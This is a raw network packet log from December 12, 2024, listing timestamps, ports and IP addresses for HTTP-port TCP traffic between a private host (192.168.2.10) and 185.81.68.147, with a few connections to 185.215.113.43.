Dec 12, 2024 16:48:49.658900976 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.659020901 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.659074068 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.659884930 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.660069942 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.660126925 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.660878897 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.661010981 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.661068916 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.661955118 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.662061930 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.662120104 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.662933111 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.663012028 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.663069010 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.663945913 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.664093018 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.664155960 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.664947033 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.665024042 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.665077925 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.665983915 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.666073084 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.666131020 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.667006016 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.667061090 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.667119980 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.667998075 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.668103933 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.668169975 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.669023991 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.669122934 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.669181108 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.670043945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.670180082 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.670248032 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.671015024 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.671125889 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.671188116 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.672044992 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.672449112 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.672511101 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.673168898 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.673422098 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.673491955 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.674062967 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.675133944 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.675143957 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.675168991 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.675194025 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.675231934 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.676054955 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.676789045 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.676851988 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.677098036 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.677263021 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.677323103 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.678127050 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.678298950 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.678359032 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.679203033 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.680013895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.680074930 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.680155993 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.680167913 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.680243015 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.681180000 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.681509018 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.681613922 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.682213068 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.682670116 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.682733059 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.683193922 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.683532953 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.683593035 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.684231997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.684401989 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.684458971 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.685211897 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.685471058 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.685523033 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.686249971 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.686745882 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.686800957 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.687309027 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.687392950 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.687436104 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.688266039 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.688739061 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.688800097 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.689306974 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.689321041 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.689358950 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.690356016 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.690442085 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.690480947 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.691390991 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.691410065 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.691502094 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.692351103 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.692909956 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.692965031 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.693357944 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.693449974 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.693502903 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.694392920 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.694499969 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.694551945 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.695385933 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.695921898 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.695976973 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.696379900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.696485043 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.696535110 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.697413921 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.697695971 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.697747946 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.698524952 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.698558092 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.698595047 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.699470997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.699620962 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.699670076 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.700443983 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.700586081 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.700637102 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.701462030 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.701630116 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.701695919 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.702593088 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.702604055 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.702662945 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.703532934 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.703901052 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.703954935 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.704451084 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.769928932 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.843847036 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.843858957 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.843935966 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.844050884 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.844212055 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.844343901 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.845189095 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.845273018 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.845331907 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.846077919 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.846806049 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.847158909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.847165108 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.847223997 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.848187923 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.848431110 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.848484993 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.849179983 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.849188089 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.849255085 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.850158930 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.851202965 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.851210117 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.851269960 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.851344109 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.851397038 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.852190018 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.852771044 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.853004932 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.853204012 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.853377104 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.853447914 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.854326010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.855091095 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.855210066 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.855304003 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.855813026 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.855907917 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.856251955 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.856393099 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.856507063 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.857320070 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.858191967 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.858383894 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.858741999 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.859683037 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.859692097 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.859699011 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.859754086 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.859772921 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.860588074 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.861356020 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.861386061 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.861392975 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.861421108 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.861443996 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.862301111 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.862478018 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.862529993 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.863358021 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.864289045 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.864353895 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.864368916 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.864377022 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.864423990 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.865346909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.865525961 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.865575075 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.866405010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.866415024 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.866492033 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.867392063 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.868114948 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.868323088 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.868443012 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.868524075 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.868621111 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.869431019 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.869997978 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.870094061 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.870438099 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.871129036 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.871257067 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.871423960 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.871905088 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.872073889 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.872446060 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.872997999 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.873049974 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.873465061 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.873584032 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.873653889 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.874463081 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.875416040 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.875482082 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.875544071 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.875551939 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.875598907 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.876527071 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.876646042 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.876759052 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.877523899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.877959013 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.878266096 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.878532887 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.879170895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.879230976 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.879589081 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.879915953 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.879975080 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.880613089 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.880620956 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.880671978 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.881562948 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.882262945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.882380962 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.882755041 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.882862091 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.882946014 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.883640051 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.883697033 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.883748055 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.884634972 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.884721041 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.884779930 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.885725975 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.886276007 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.886327982 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.886662006 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.887763977 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.887772083 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.887787104 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.887823105 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.887856007 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.888708115 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.888757944 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.888853073 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.889694929 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.889815092 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.889878988 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.890798092 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.890805006 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.890856028 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.891716003 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.891897917 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.891959906 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.892738104 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.893183947 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.893241882 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.893785954 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.893961906 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.894052982 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.894790888 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.895190954 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.895248890 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.895838976 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.895845890 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.895904064 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:49.896733046 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:49.946631908 CET	49951	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:49.947655916 CET	49970	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:50.009725094 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.036104918 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.036185026 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.036242962 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.036592960 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.036803961 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.036845922 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.036928892 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.037967920 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.038214922 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.038284063 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.039236069 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.039274931 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.039422989 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.040002108 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.040074110 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.040277958 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.040960073 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.040966034 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.041023016 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.041930914 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.042005062 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.042078972 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.042829037 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.042886019 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.042916059 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.043610096 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.043694019 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.043732882 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.044560909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.044636965 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.044831991 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.045598030 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.045716047 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.045725107 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.046613932 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.046622992 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.046737909 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.047605038 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.047745943 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:50.047965050 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:50.048634052 CET	80	49946	185.81.68.147	192.168.2.10
